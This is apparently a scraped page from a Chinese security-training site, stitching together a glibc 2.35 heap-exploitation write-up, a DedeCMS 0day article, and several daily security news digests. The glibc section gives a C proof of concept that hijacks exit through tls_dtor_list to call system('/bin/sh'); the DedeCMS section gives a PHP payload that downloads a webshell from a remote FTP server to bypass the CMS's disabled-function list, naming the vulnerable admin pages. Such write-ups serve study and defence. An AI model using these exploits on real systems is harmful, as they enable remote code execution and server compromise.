蚁景网安 - 网络安全人才培养服务提供商

glibc2.35-通过tls_dtor_list劫持exit执行流程

前言 glibc2.35删除了malloc_hook、free_hook以及realloc_hook，通过劫持这三个hook函数执行system已经不可行了。传统堆漏洞利用是利用任意地址写改上上述几个hook从而执行system，在移除之后则需要找到同样只需要修改某个地址值并且能够造成程序流劫持的效果。 __call_tls_dtors 在程序返回时会通过exit函数，exit函数会经历以下调用过程 exit -> __run_exit_handlers -> __call_tls_dtors 而__call_tls_dtors函数中则存在着可以进行劫持的地址，__call_tls_dtors函数的执行如下：判断tls_dtor_list为空不为空则将tls_dtor_list赋值给cur 取出函数指针cur->func 通过PTR_DEMANGLE宏解密指针值执行函数指针 void __call_tls_dtors (void) { while (tls_dtor_list) { struct dtor_list *cur = tls_dtor_list; dtor_func func = cur->func; #ifdef PTR_DEMANGLE PTR_DEMANGLE (func); #endif tls_dtor_list = tls_dtor_list->next; func (cur->obj); atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1); free (cur); } } 通过上述流程可知，若能够劫持tls_dtor_list，则可以将cur->func指向的位置修改为system函数。具体取出tls_dtor_list的汇编语言如下首先取出tls_dtor_list的下标值，即rbx寄存器的值为0xffffffffffffffa8，转换为十进制为-88 而该下标是用fs进行寻址的，然后取出tls_dtor_list的值判断是否为空那么假设已经存在任意地址写的漏洞，并且将tls_dtor_list修改为不是空值，看看后续会进入哪些校验流程首先遇到第一个问题，在后续的流程中需要将tls_dtor_list的内容作为指针值进行索引，因此我们不能够直接将system函数的地址写入tls_dtor_list，而是需要将指向system函数的指针写入。即在堆题中，我们新创建一个堆，并在堆内容写入system函数的地址，然后将堆地址填充到tls_dtor_list中根据上述的方法，我们成功进入后续的流程但是在执行函数执行时，会遇到另一个问题，最后的指针值被修改为乱七八糟的值了。这是因为上述的宏定义PTR_DEMANGLE，需要将函数指针进入一个解密的流程，因此在传递指针值时，需要先传递一个加密后的指针值。解密的流程如下，先将指针循环右移0x11，然后与fs:[0x30]进行异或。循环右移比较好解决，先将指针循环左移即可。但是这个异或值则需要获得fs:[0x30]的值。 0x7ffff7c45d88 <__call_tls_dtors+40> ror rax, 0x11 0x7ffff7c45d8c <__call_tls_dtors+44> xor rax, qword ptr fs:[0x30] 也可以看到这个值是一个八字节的随机值，因此通过爆破获得的可能性不大。那么该攻击方法需要的一个要求就是能够获得该随机值或者能够篡改该值。需要注意点是指针值是先循环右移在异或，因此在加密指针时需要先异或在循环左移。那么解决上述问题之后就能够正确调用地址了，此时就应该考虑该函数指针需要如何传参。可以看到下图，rdi寄存器是通过我们传入的指针值作为基地址进行寻址的，只需要在偏移加8的位置填充/bin/sh的地址值即可。 POC #include <stdio.h> #include <stdlib.h> #include <string.h> unsigned long long rotate_left(unsigned long long value, int left) { return (value << left) | (value >> (sizeof(unsigned long long) * 8 - left)); } int main() { unsigned long long fs_base; unsigned long long index = 0xffffffffffffffa8; unsigned long long tls_dtor_list_addr; unsigned long long random_number; void *system_ptr = (void *)&system; printf("system:%p\n",system_ptr); // 使用汇编嵌入获取FS寄存器的值 asm("mov %%fs:0, %0" : "=r" (fs_base)); printf("Value in FS register: 0x%llx\n", fs_base); tls_dtor_list_addr = fs_base - 88; random_number = *(unsigned long long *)(fs_base + 0x30); char *str_bin_sh = malloc(0x20); strcpy(str_bin_sh,"/bin/sh"); void *ptr = malloc(0x20); *(unsigned long long *)ptr = rotate_left((unsigned long long)system_ptr ^ random_number,0x11); *(unsigned long long *)(ptr + 8) = str_bin_sh; *(unsigned long long *)tls_dtor_list_addr = ptr; return 0; } 总结简单总结一下通过tls_dtor_list劫持exit执行流程的条件存在任意地址写的漏洞利用能够篡改或泄露fs_base + 0x30的值程序会通过exit函数结束程序，若是通过_exit则不行

网络安全日报 2023年09月06日

1、研究人员披露Gamaredon组织乌克兰反攻期间的活动 https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/%D0%90%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%96%D1%81%D1%82%D1%8C%20%D1%83%D0%B3%D1%80%D1%83%D0%BF%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8F.pdf 研究人员发布了威胁趋势的新报告，分析了 Gamaredon 组织在乌克兰反攻前夕的活动增长情况。在军事行动新阶段的背景下，俄罗斯集团的活动日益增多。特别是试图窃取秘密军事信息的活动。在乌克兰反攻之前，Gamaredon 组织准 2、研究人员披露RemcosRat恶意软件 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware 研究人员观察到 Remcos RAT 活动，其中恶意 VBS 文件通过网络钓鱼电子邮件传递。网络钓鱼电子邮件包含 ZIP/RAR 附件。在这个 ZIP 中，有一个严重混淆的 VBS 文件。 Remcos 是一种复杂的 RAT，它为攻击者提供对受感染系统的后门访问并收集各种敏感信息。Remcos 结合了不同的混淆和反调试技术来逃避检测。RemcosRat是一种复杂的多阶段威胁。研究人员解开了该恶意软件 3、LogicMonitor客户因使用默认密码而遭到黑客攻击 https://techcrunch.com/2023/08/31/logicmonitor-customers-hit-by-hackers-because-of-default-passwords/ 网络安全公司 LogicMonitor 的一些客户因使用默认密码而遭到黑客攻击。LogicMonitor 发言人在一份声明中表示，目前正在解决影响少数客户的安全事件。我们正在与这些客户直接沟通并密切合作，采取适当措施减轻影响。该事件的起因是，直到本周，LogicMonitor 还在为客户分配默认的弱密码，例如“Welcome@”加上一个短号码。当你使用 [LogicMonitor] 设置帐户 4、攻击者针对MS SQL服务器部署FreeWorld勒索软件 https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/ 攻击者正在利用安全性较差的 Microsoft SQL (MS SQL) 服务器来传播 Cobalt Strike 和名为 FreeWorld 的勒索软件病毒。研究人员将该活动称为“DB#JAMMER”，表示该活动因其工具集和基础设施的使用方式而脱颖而出。其中一些工具包括枚举软件、RAT 有效负 5、VMware Aria SSH身份验证绕过漏洞的POC发布 https://kb.vmware.com/s/article/94152 针对最近披露并修补的影响 VMware Aria Operations for Networks（以前称为 vRealize Network Insight）的关键缺陷，已提供概念验证 (PoC) 漏洞利用代码。该缺陷的编号为CVE-2023-34039，严重程度为 9.8 分（满分 10 分），并被描述为由于缺乏唯一加密密钥生成而导致身份验证绕过的情况。具有 Aria Operations for Networks 网络访问权限的恶意行为者可以绕过 SSH 身份验证来访问 Aria Operations for N 6、黑客从加密货币博彩平台 STAKE 窃取了价值 4100 万美元的资产 https://securityaffairs.com/150401/hacking/crypto-gambling-firm-stake-hacked.html 研究人员报告称，从加密货币赌博网站 Stake 提取的资金异常大量到一个之前没有任何活动的账户，这种情况表明威胁行为者已经侵入了该平台并窃取了包括 Tether 和 Ether 在内的加密资产。 7、FREECYCLE 数据泄露影响了 700 万用户 https://securityaffairs.com/150392/security/the-freecycle-network-data-breach.html 非营利组织 Freecycle Network (Freecycle.org) 确认其遭受了数据泄露，影响了超过 700 万用户。 8、德国联邦金融监管局 (BaFin) 的网站DDoS攻击而瘫痪数日 https://securityaffairs.com/150359/hacking/ddos-attack-on-bafin.html 德国联邦金融监管局 (BaFin) 的网站因分布式拒绝服务 (DDoS) 攻击而瘫痪。 9、MITRE 和 CISA 发布用于模拟OT 攻击的开源工具 https://www.securityweek.com/mitre-and-cisa-release-open-source-tool-for-ot-attack-emulation/ MITRE 公司和美国网络安全和基础设施安全局 (CISA) 今天宣布了开源 Caldera 平台的新扩展，该平台可模拟针对运营技术 (OT) 的对抗性攻击。Caldera for OT扩展是国土安全系统工程与开发研究所 (HSSEDI) 与 CISA 合作的成果，旨在帮助提高关键基础设施的弹性。Caldera 网络安全平台提供自动对手模拟、安全评估以及红、蓝、紫组队，并使用 MITRE ATT&CK 框架 10、大量黑客针对 Okta 超管权限发起社工攻击 https://thehackernews.com/2023/09/okta-warns-of-social-engineering.html 身份服务提供商 Okta 警告称，有威胁攻击者针对该公司进行了一次社会工程攻击并获得了管理员权限。免责声明以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

Dedecms最新版--0day分享分析(二)

前言接之前写的一篇https://www.yijinglab.com/specialized/20230814150207，既然利用远程文件下载方式成为了实现RCE的最好方法，毕竟在执行的时候没有恶意shell文件，恶意木马被存放于远端服务器，那么下文的day就是对远程恶意文件的利用。环境下载最新版本： https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.110-UTF8.zip影响版本： <=DedeCMS-V5.7.110 漏洞URL: /uploads/dede/article_string_mix.php /uploads/dede/sys_data.php /uploads/dede/sys_task.php /uploads/dede/media_add.php /uploads/dede/article_template_rand.php 漏洞详情远程服务器开启ftp服务控制面板 >> 程序 >> 启用或关闭windows功能完成更改计算机管理添加FTP站点配置地址以及账号密码上面存放一句话木马文件内容为 payload如下： <? $ftp_server = "192.168.0.102"; $ftp_username = "administrator"; $ftp_password = "147258369"; $file = "shell.php"; $local_file = "shell2.php"; // set up basic connection $conn_id = ftp_connect($ftp_server); // login with username and password $login_result = ftp_login($conn_id, $ftp_username, $ftp_password); // try to download $file and save to $local_file if (ftp_get($conn_id, $local_file, $file, FTP_BINARY)) { echo "Successfully downloaded $file\n"; } else { echo "There was a problem while downloading $file\n"; } // close the connection ftp_close($conn_id); ?> 代码中的”ftp_server”为远程服务器地址，”ftp_username”为远程ftp登录用户名，”ftp_password”为ftp登录密码，”$file”为远程服务器的shell文件名，”$local_file”为从远程服务器下载木马文件到本地的重命名文件。通过利用ftp_get函数远程下载恶意代码文件，代码中的”ftp_server”为远程服务器地址，”ftp_username”为远程ftp登录用户名，”ftp_password”为ftp登录密码，”$file”为远程服务器的shell文件名，”$local_file”为从远程服务器下载木马文件到本地的重命名文件。文件保存后，访问路径 /uploads/data/template.rand.php 提示已经成功下载一句话木马文件，查看当前目录已经生成名称为shell2.php的shell文件 http://dedecms.xyz:8066/uploads/data/shell1.php 成功命令执行漏洞分析 DedeCMS-V5.7.109-UTF8\uploads\dede\media_add.php 上传文件的时候仅仅只对权限以及上传类型做了校验，对文件内容未做校验导致漏洞产生。继续向下看，文件上传文件处理代码DedeCMS-V5.7.109-UTF8\uploads\dede\file_manage_control.php 代码中定义了disable_funs,但是禁用的函数涉及 phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace'; $cfg_disable_funs = $cfg_disable_funs.',[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert,getallheaders 在上面的payload中，利用手法利用点儿在于 ftp_get函数是可以绕过disable_funs的，使用该函数实现bypass进行远程恶意代码调用，导致RCE。小结其它的方法也可以尝试，ftp远程调用，telnet远程调用等，包括很多方法可以实现，但是使用条件存在限制。其实在Dede由于后台参数可以直接进行配置，代码中disable_funs的定义没有意义，该模块只要存在，只要绕过正则，RCE的方式有很多。

网络安全日报 2023年09月05日

1、研究人员披露RedEyes组织利用恶意LNK传递后门 https://asec.ahnlab.com/ko/56526/ RedEyes 组织，也称为 APT37、ScarCruft ，该组织使用的恶意软件以前以 CHM 格式传播，现在以 LNK 格式传播。恶意代码通过 mshta 进程执行特定 url 中存在的附加脚本，从攻击者的服务器接收命令，并执行附加的恶意操作。经研究人员确认，已确认的 LNK 文件是由攻击者将包含恶意代码的压缩文件上传到正常站点来分发的。恶意 LNK 文件以文件名 REPORT.ZIP 上传。该文件在 LNK 内包含正常的 Excel 文档数据和恶意脚本代码。近期大量利用 CHM、LNK 的恶意代码正在传播，用户需格外 2、UAC-0057组织利用WinRAR软件漏洞进行网络攻击 https://cert.gov.ua/article/5661411 研究人员检测到 UAC-0057 组织利用 CVE-2023-38831、PicassoLoader JavaScript 变体、Rabbit 算法和 Cobalt Strike Beacon 的一次网络攻击。研究人员发现包含CVE-2023-38831漏洞利用的文件 Zbirnyk_tez_НУОУ_23.rar ，成功利用该文件将导致执行BAT文件 16872_16_2023_03049.pdf .cmd ，这将确保启动 LNK 文件 16872_16_2023_03049.lnk 的一部分，该文件使用 mshta. 3、研究人员披露Emotet银行木马再次出现 https://www.trellix.com/en-us/about/newsroom/stories/research/icymi-emotet-reappeared-early-this-year-unfortunately.html Emotet 恶意软件，也称为 Geodo 和 Heodo，是一种著名的银行木马，但也可用作其他恶意软件的下载程序或植入程序。该恶意软件于 2014 年首次出现，2021 年 1 月，Emotet 基础设施被拆除，但于当年 11 月恢复，并在 2022 年和 2023 年初增加其运营。Emotet 仍然是一种危险且有弹性的恶意软件，因为 Emotet 攻 4、AlphV勒索软件组织称针对乔治亚县进行攻击 https://therecord.media/forsyth-county-georgia-ransomware-alphv-post AlphV勒索软件组织（也称为 BlackCat）声称对佐治亚州一个大县发动了攻击，该地距亚特兰大约一小时车程。福赛斯县官员承认六月发生过袭击事件，但没有提供有关所发生事件的细节。周二，AlphV 团伙声称对此次袭击负责，并将该县添加到其泄露站点，并威胁要公开 350GB 据称被盗的数据。该县于 6 月份发出了违规通知信，警告该县超过 250000 名居民，文件在未遂攻击期间从县服务器中被删除。完成审查后，他们发现社会安全号码和驾驶执照号码被盗。调查人员搜 5、X 将从其高级用户那里收集生物识别数据用于安全和身份识别 https://securityaffairs.com/150350/digital-id/x-will-collect-biometric-data.html 社交媒体平台 X（以前称为 Twitter）更新了其隐私政策，通知其高级用户该公司将收集他们的生物识别数据以遏制欺诈和防止冒充。彭博社首先报道了这一消息，并确认这一变化只会影响高级用户。 6、MinIO 存储系统漏洞被利用在受影响的服务器上执行任意代码 https://securityaffairs.com/150308/breaking-news/minio-storage-system-exploit.html Security Joes 研究人员观察到，一个未知的威胁参与者使用公开可用的 MinIO 对象存储系统漏洞利用链，在易受攻击的服务器上实现任意代码执行。 7、Chrome 扩展程序可以从网站窃取明文密码 https://www.bleepingcomputer.com/news/security/chrome-extensions-can-steal-plaintext-passwords-from-websites 威斯康星大学麦迪逊分校的一组研究人员已将一个概念验证扩展上传到 Chrome 网上应用店，该扩展可以从网站的源代码中窃取纯文本密码。此外，研究人员发现，许多拥有数百万访问者的网站（包括一些 Google 和 Cloudflare 门户）在其网页的 HTML 源代码中以明文形式存储密码，允许扩展程序检索它们。 8、Fitbit可能因涉嫌违反GDPR而面临11亿欧元的罚款 https://cybernews.com/news/fitbit-violates-gdpr/ 针对谷歌旗下的健康和健身公司Fitbit提出了三起投诉，该公司强迫新用户同意将高度个人数据传输到欧盟以外。 9、Clop声称通过M&T银行网络攻击导致宾夕法尼亚州数据泄露 https://thecyberexpress.com/clop-claims-the-pennsylvania-data-breach/ 在通过M&T银行黑客攻击获得马萨诸塞州居民的信息后，Clop声称宾夕法尼亚州数据泄露。 10、英国国防部数千份绝密文件被俄罗斯黑客泄露 https://www.secrss.com/articles/58460 据镜报当地时间9月2日21：21分更新的报道，英国军事和情报网站的绝密安全信息已被与俄罗斯有关的黑客在网上泄露。攻击者发布了数千页的数据，这些数据可以帮助犯罪分子进入HMNB克莱德核潜艇基地、波顿当化学武器实验室和GCHQ监听站。免责声明以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

借助AI分析哥斯拉木马原理与Tomcat回显链路挖掘

网络安全日报 2023年09月04日

1、Anonymous Sudan组织针对X(Twitter)应用程序进行网络攻击 https://www.bbc.com/news/technology-66668053 周二上午，Anonymous Sudan 的黑客组织攻击了 X（以前称为 Twitter），影响到了十多个国家，试图向埃隆·马斯克施压，迫使其在这些国家推出星链服务。X 宕机了两个多小时，数千用户受到影响。黑客在 Telegram 上发帖称：“让我们的信息传达给埃隆·马斯克：‘在苏丹开放星链’。” 研究人员在聊天应用程序 Telegram 上与该小组进行了数周的私人对话，并与黑客谈论了他们的方法和动机。 2、研究人员披露Spring-Kafka反序列化零日漏洞 https://www.contrastsecurity.com/security-influencers/contrast-assess-uncovers-spring-kafka-deserialization-zero-day 8 月初，安全厂商的用户报告了他们最初认为是误报的情况： Spring-Kafka中存在反序列化漏洞。 Spring 由 VMware 和 Pivotal Software 开发，是一个用于构建企业 Java 应用程序的开源框架，而 Spring for Apache Kafka (Spring-Kafka) 项目将 Spring 的核心概念应用于基于 Kafk 3、开源工具SapphireStealer可用于窃取凭证和数据 https://blog.talosintelligence.com/sapphirestealer-goes-open-source/ SapphireStealer 是一种开源信息窃取程序，自 2022 年 12 月首次公开发布以来，在公共恶意软件存储库中出现的频率不断增加。SapphireStealer 等信息窃取恶意软件可用于获取敏感信息，包括公司凭证，这些信息通常会转售给其他攻击者，这些攻击者利用该访问权限进行其他攻击，包括与间谍活动或勒索软件相关的操作。SapphireStealer 似乎是作为多阶段感染过程的一部分进行攻击的，攻击者利用 FUD-Loader 等开源恶意软件下载 4、研究人员披露Andariel组织攻击活动 https://asec.ahnlab.com/en/56405/ Andariel 威胁组织通常针对韩国企业和组织，隶属于 Lazarus 威胁组织或其子公司之一。自2008年以来，针对韩国目标的攻击已被确定。主要目标行业是国防、政治组织、造船、能源和通信等与国家安全相关的行业。韩国的其他各种公司和机构，包括大学、物流和信息通信技术公司也成为攻击目标。研究人员发现存在大量用 Go 语言开发的恶意软件样本。在使用 Innorix Agent 的攻击案例中，使用了用 Go 开发的 Reverse Shell。随后 Black RAT 被用于针对韩国公司的攻击。除了Go版本之外，DurianBe 5、LockBit勒索软件组织针对蒙特利尔电力委员会进行攻击 https://therecord.media/montreal-electricity-organization-lockbit-victim 周三，LockBit勒索软件组织声称对蒙特利尔电力服务委员会 (CSEM) 进行了攻击，该委员会是一个拥有 100 年历史的市政组织，负责管理蒙特利尔市的电力基础设施。该市政组织周二证实了这一事件，并在一份声明中写道，该市政组织于 8 月 3 日遭到勒索软件攻击，但拒绝支付赎金。它联系了魁北克省的国家当局和执法部门，同时尽一切努力恢复其系统。该公司表示，其 IT 基础设施已经重建。参与此案的犯罪组织今天公开了一些被盗数据。CSEM 谴责这种非法行为 6、研究人员披露攻击者利用Adobe ColdFusion漏洞进行攻击活动 https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities 今年 7 月，Adobe 公司发布了一系列安全更新： APSB23-40 、 APSB23-41 和 APSB23-47 ，以回应其 ColdFusion 解决方案中针对预身份验证远程代码执行（RCE）漏洞的利用报告。研究人员对这些漏洞的深入分析，其中包括 Adobe ColdFusion 2021 内 WDDX 反序列化过程中的一个重大漏洞。然而，安全更新后，遥测数据继续检测到大量利用 7、WordPress迁移插件漏洞可能导致数据泄露 https://patchstack.com/articles/pre-auth-access-token-manipulation-in-all-in-one-wp-migration-extensions/ All-in-One WP Migration 是一款流行的 WordPress 网站数据迁移插件，拥有 500 万个活跃安装量，它受到未经身份验证的访问令牌操纵的影响，可能允许攻击者访问敏感的网站信息。All-in-One WP Migration 是一款用户友好的 WordPress 网站迁移工具，适合非技术和缺乏经验的用户，允许将数据库、媒体、插件和主题无缝导出到单个存档中，以 8、研究人员开发Key Group勒索软件解密器以恢复数据 https://blog.eclecticiq.com/decrypting-key-group-ransomware-emerging-financially-motivated-cyber-crime-gang Key Group 是一家讲俄语的威胁组织，于 2023 年初突然采取行动，攻击各种组织，从受感染的系统窃取数据，然后使用私人 Telegram 渠道协商赎金支付。俄罗斯威胁情报公司 BI.ZONE 此前曾报道称，Key Group 的勒索软件基于 Chaos 4.0 构建器，而研究人员则发现该组织在俄语暗网市场上销售窃取的数据和 SIM 卡，并共享人肉搜索数据和远程访问到网络摄 9、Classiscam诈骗即服务业务非法获利6450万美元 https://www.group-ib.com/blog/classiscam-2023/ 自 2019 年推出以来，Classiscam 诈骗即服务计划已为犯罪分子获取了 6450 万美元的非法收入。Classiscam 活动最初始于分类网站，诈骗者在这些网站上放置虚假广告，并利用社会工程技术说服用户通过将钱转入银行卡来购买商品。从那时起，Classiscam 活动已变得高度自动化，并且可以在许多其他服务上运行，例如在线市场和拼车网站。大多数受害者来自欧洲（62.2%），其次是中东和非洲（18.2%）以及亚太地区（13%）。德国、波兰、西班牙、意大利和罗马尼亚在 Classiscam 聊 10、Lazarus组织使用VMConnect恶意软件进行供应链攻击 https://www.reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues 8 月初，研究人员发现了一个恶意供应链活动，将其称为“VMConnect”。该活动包括发布到 Python 包索引 (PyPI) 开源存储库的两打恶意 Python 包。这些软件包模仿了流行的开源Python工具，包括vConnector ，这是一个用于pyVmomi VMware vSphere绑定的包装模块；eth-tester，用于测试基于以太坊的应用程序的工具集合；和数据库，一种为一系列数据库提供异步支持的工具。研究人员继续监控免责声明以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

smartbi token回调获取登录凭证漏洞（二）

网络安全日报 2023年09月01日

1、密歇根大学遭遇网络攻击后被迫关闭网络 https://umich.edu/announcements/ 密歇根大学为了应对网络安全事件，已将所有系统和服务下线，在开课前一天晚上对在线服务造成了广泛影响。密歇根大学 (UM) 是美国历史最悠久、规模最大的教育机构之一，拥有 30000 多名学术和行政人员，大约有 51000 名学生。从周日开始，该大学网站上发布了一系列公告，一次网络安全事件导致 IT 中断，并中断了对重要在线服务的访问，包括 Google、Canvas、Wolverine Access 和电子邮件。尽管密歇根大学聘请 IT 团队来恢复受影响的系统，但由于事件的严重性，管理层认为断开密歇根大学网络与互联网的连接是最 2、DreamBus僵尸网络利用RocketMQ漏洞感染服务器 https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability 新版本的 DreamBus 僵尸网络恶意软件利用 RocketMQ 服务器中的严重远程代码执行漏洞来感染设备。被利用的漏洞被追踪为 CVE-2023-33246，是一个权限验证问题，影响 RocketMQ 5.1.0 及更早版本，允许攻击者在某些条件下执行远程命令。研究人员发现了最近利用该缺陷的 DreamBus 攻击，他们报告称该活动在 2023 年 6 月中旬出现激增。在 202 3、新型安卓恶意软件MMRat利用Protobuf协议窃取数据 https://www.trendmicro.com/en_us/research/23/h/mmrat-carries-out-bank-fraud-via-fake-app-stores.html 新型安卓银行恶意软件 MMRat 利用很少使用的通信方法（protobuf 数据序列化）来更有效地从受感染的设备窃取数据。MMRat 于 2023 年 6 月下旬首次被发现，主要针对东南亚用户，并且在 VirusTotal 等防病毒扫描服务中仍未被发现。虽然研究人员不知道恶意软件最初是如何传播给受害者的，但他们发现 MMRat 是通过伪装成官方应用商店的网站分发的。受害者下载并安装携带 MMR 4、研究人员演示利用Microsoft Entra ID提升权限技术 https://www.secureworks.com/research/power-platform-privilege-escalation 研究人员发现，通过利用废弃的回复 URL 与 Microsoft Entra ID（以前称为 Azure Active Directory）应用程序相关的权限升级案例。攻击者可以利用这个废弃的 URL 将授权代码重定向到自己，用非法获取的授权代码交换访问令牌。然后，攻击者可以通过中间层服务调用 Power Platform API 并获得提升的权限。研究人员还提供了一个开源工具用来扫描废弃的回复 URL。 5、微软警告AiTM网络钓鱼攻击活动增多 https://thehackernews.com/2023/08/phishing-as-service-gets-smarter.html 微软警告称，AiTM 网络钓鱼技术有所增加，这些技术正在作为网络钓鱼即服务 (PhaaS) 网络犯罪模型的一部分进行传播。除了支持 AiTM 的 PhaaS 平台有所增加之外，微软还指出，PerSwaysion 等现有的网络钓鱼服务正在整合 AiTM 功能。微软威胁情报团队发布的一系列帖子中表示：“PhaaS 生态系统的这一发展使攻击者能够进行大量网络钓鱼活动，试图大规模规避 MFA 保护。”具有 AiTM 功能的网络钓鱼工具包以两种方式工作，其中一 6、Akira 勒索软件针对未配置多重身份验证的 Cisco ASA https://securityaffairs.com/150157/cyber-crime/cisco-asa-ransomware-attacks.html 思科了解到Akira 勒索软件威胁行为者针对未配置多重身份验证的 Cisco ASA VPN 实施了攻击。 7、朝鲜黑客在 PyPI 存储库中部署新的恶意 Python 包 https://thehackernews.com/2023/08/north-korean-hackers-deploy-new.html 作为正在进行的名为VMConnect的恶意软件供应链活动的一部分，在软件包索引 (PyPI) 存储库中还发现了另外三个流氓 Python 软件包，有迹象表明朝鲜国家支持的威胁行为者参与其中。 8、Netgear 发布了两个高严重性漏洞的补丁 https://therecord.media/netgear-releases-patches-for-two-bugs 网络硬件巨头 Netgear 发现了两个漏洞，影响其一款路由器型号及其网络管理软件。其中一个漏洞（编号为 CVE-2023-41183）允许黑客利用 Netgear 的 Orbi 760 路由器。 9、美国国家安全委员会数据泄露，影响包括政府组织和2000多家公司 https://securityaffairs.com/150138/security/nasa-tesla-doj-verizon-2k-leaks.html 美国国家安全委员会泄露了其成员的近万封电子邮件和密码，影响包括政府组织和大公司在内的 2000 家公司。 10、NoName057(16)组织针对波兰证券交易所和银行进行网络攻击 https://cybernews.com/cyber-war/polish-stock-exchange-banks-knocked-offline-by-pro-russian-hackers/ 俄罗斯背景的 NoName057(16) 组织于周一上午 10 点左右在他们的加密 Telegram 频道上宣布了针对波兰的网络攻击事件。该组织的第一个目标是华沙证券交易所。该组织发布消息称：“为了向所有反对本国当局陷入恐俄症的波兰公民表示支持，我们今天的 DDoS 攻击瞄准了波兰目标。”然而，该组织继续对几家波兰主要商业银行提出索赔，包括北高银行、Raiffeisen 银行、Plus 银行、农免责声明以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

网络安全日报 2023年08月31日

1、研究人员披露BLISTER恶意软件加载程序新变种 https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader BLISTER 是一种恶意软件加载程序，最初发现于 2021 年，与经济动机的入侵相关。在首次发现两年后，研究人员发现了更新的 SOCGHOLISH 感染链，用于分发 BLISTER 并部署来自 MYTHIC 的有效负载。研究人员发现了 BLISTER 系列以前不具备的新功能，表明该恶意软件仍在进行开发。该恶意软件继续使用一种独特的技术，将恶意代码嵌入到合法的应用程序中,编写大量的良性代码和使用加密来避免 2、Cisco NX-OS软件存在远程身份验证漏洞 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-remoteauth-dos-XB6pv74m Cisco NX-OS 软件的 TACACS+ 和 RADIUS 远程身份验证中的漏洞可能允许未经身份验证的本地攻击者导致受影响的设备意外重新加载。如果为 TACACS+ 或 RADIUS 启用了定向请求选项，则此漏洞是由于处理身份验证尝试时的输入验证不正确造成的。攻击者可以通过在受影响设备的登录提示符下输入精心设计的字符串来利用此漏洞。成功利用此漏洞可能会让攻击 3、KittenSec组织称针对北约国家和私营部门进行网络攻击 https://cyberscoop.com/kittensec-hacktivism-corruption/ KittenSec黑客组织声称，在过去的一个月里，它袭击了多个北约国家的政府和私营部门的计算机系统，并通过揭露腐败来证明其攻击的合理性。 4、严重 RCE 漏洞影响 VMware Aria Operations Networks https://securityaffairs.com/150079/security/vmware-aria-operations-networks-rce.html VMware 修复了 Aria Operations for Networks 中的两个安全漏洞，这些漏洞可被用来绕过身份验证并获得远程代码执行。 5、BGP 漏洞可被利用造成长时间的互联网中断 https://www.securityweek.com/bgp-flaw-can-be-exploited-for-prolonged-internet-outages/ 一位研究人员周二警告说，影响几个主要边界网关协议（BGP）实施的严重缺陷可能会被利用导致长时间的互联网中断，但一些供应商并没有修补它。 6、DreamBus僵尸网络利用RocketMQ漏洞植入恶意挖矿程序 https://www.securityweek.com/dreambus-botnet-exploiting-rocketmq-vulnerability-to-delivery-cryptocurrency-miner/ DreamBus 僵尸网络在中断两年后重新出现，人们发现它利用最近修补的 Apache RocketMQ 漏洞进行攻击，其目标是进行恶意挖矿。 7、Qakbot 被FBI摧毁，并向受感染的70W台机器下发了自动卸载程序 https://www.securityweek.com/operation-duck-hunt-qakbot-malware-disrupted-8-6-million-in-cryptocurrency-seized/ 执法当局周二宣布跨境捣毁臭名昭著的 Qakbot 网络犯罪活动，该活动通过勒索软件和金融欺诈攻击袭击了全球超过 70 万台计算机。这次行动被称为“猎鸭行动”，包括接管 Qakbot 基础设施和分发一个软件实用程序，以自动从受感染的计算机上卸载 Qakbot恶意软件。 8、MMRat Android 木马通过远程控制设备并进行金融欺诈 https://thehackernews.com/2023/08/mmrat-android-trojan-executes-remote.html 自 2023 年 6 月下旬以来，一种名为MMRat的先前未记录的 Android 银行木马以东南亚的移动用户为目标，远程控制设备并进行金融欺诈。 9、黑客可以利用 Windows 容器隔离框架绕过端点安全 https://thehackernews.com/2023/08/hackers-can-exploit-windows-container.html 新发现表明，恶意行为者可以利用偷偷摸摸的恶意软件检测规避技术，并通过操纵 Windows 容器隔离框架来绕过端点安全解决方案。Deep Instinct 安全研究员 Daniel Avinoam 在本月早些时候举行的DEF CON 安全会议上介绍了这一发现。 10、Microsoft 向 Exchange Server 2016 和 2019 添加 HSTS 支持 https://www.bleepingcomputer.com/news/security/microsoft-adds-hsts-support-to-exchange-server-2016-and-2019/ Microsoft 今天宣布，Exchange Server 2016 和 2019 现在支持 HTTP 严格传输安全（也称为 HSTS）。HSTS 是一种 Web 服务器指令，指示网站（例如适用于 Exchange Server 的 OWA 或 ECP）仅允许通过 HTTPS 进行连接，从而保护它们免受通过协议降级和 